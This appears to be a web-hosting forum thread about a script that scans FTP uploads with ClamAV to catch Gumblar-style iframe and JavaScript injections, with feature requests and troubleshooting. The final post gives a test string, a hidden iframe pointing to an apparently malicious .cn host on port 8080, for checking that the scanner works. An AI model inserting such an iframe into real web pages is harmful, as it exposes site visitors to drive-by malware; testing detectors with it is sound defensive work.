SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...

Voltio

Active Member
Oct 17, 2004
32
0
156
This script seems very insteresting and useful, for some reason it does not work in my server :(... I will keep trying to get it to work..
 

wthrees

Registered
May 4, 2005
4
0
151
Hi great work !!
I honestly appreciate what you have made for the community.

I would like to request 2 things to enhance the features:

1. I have two servers and get the alerts on the same email address for both the servers. Can you add the server hostname in the email subject? like:

Gumblar Attack !!! user : trafficn on [HostNameHere]

2. when the files are quarnteened, its a very logical and good idea to move the files to directories with the username.
I;d request you add the username dir so the file is moved to the relevent user folder. like:

/quarantine/clamav/UserNameHere/infectedfile.ext


Thanks and hope these can be implemented in the next update.
 

luisp

Well-Known Member
PartnerNOC
Jan 17, 2003
57
0
156
Portugal
cPanel Access Level
DataCenter Provider
Hello,

First, congrats for your great script. I think we all could donate something to to support this great work.

Any idea on the hostname option in subject? I have a few servers, and this option would be very important.

thanks
 

hidonet

Well-Known Member
Apr 29, 2005
55
0
156
Istanbul / Turkey
Hi,
Firstly I also want to thank you for your time on this.

I haven't tried it yet, but can you let us know how it compares to the CSX offering from Configserver.com please?

Would it also be pointless to have both?

Best regards,

- Vince
Hi,

This script just scanning uploaded files with pure-ftp. Not suitable for scanning PHP, Perl or other script based uploads...
 

9xlinux

Well-Known Member
Verifed Vendor
Dec 20, 2009
185
0
66
cPanel Access Level
Root Administrator
I have follow the error log file in same folder and found some comments in ftp_clamscan_config.php file was not in one line, so second line was not commented.
Due to this The script was showing error.
I comment out second line now the script is working fine.
Thanks for a great script.
 

noimad1

Well-Known Member
Mar 27, 2003
626
0
166
Sorry to open an old thread, but I've sucessfully installed this on 5 servers, but I have to servers that it just doesn't want to work on.

On those servers, the install appears to go ok, and the restart of pure-ftpd through ssh seems to work fine. I see this from my ps output:

root 7935 0.0 0.0 7616 260 ? Ss 15:21 0:00 /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.php
root 8268 0.0 6.4 156940 133632 ? Ssl 16:54 0:00 /usr/local/sbin/clamd


But when I upload a file nothing happens. No quarantine, no log in the log file, no e-mail?

is there a checklist of things I should try maybe?
 

Voltio

Active Member
Oct 17, 2004
32
0
156
How to test it?

How can I test it? I've installed it but how can I make sure it works.? I uploaded a .php file with the following lines:

iframe
http://
:8080
 

noimad1

Well-Known Member
Mar 27, 2003
626
0
166
How can I test it? I've installed it but how can I make sure it works.? I uploaded a .php file with the following lines:

iframe
http://
:8080
Create a file with this in it:

Code:
<iframe src="http://gianthighest.cn:8080/index.php" width=171 height=190 style="visibility: hidden"></iframe>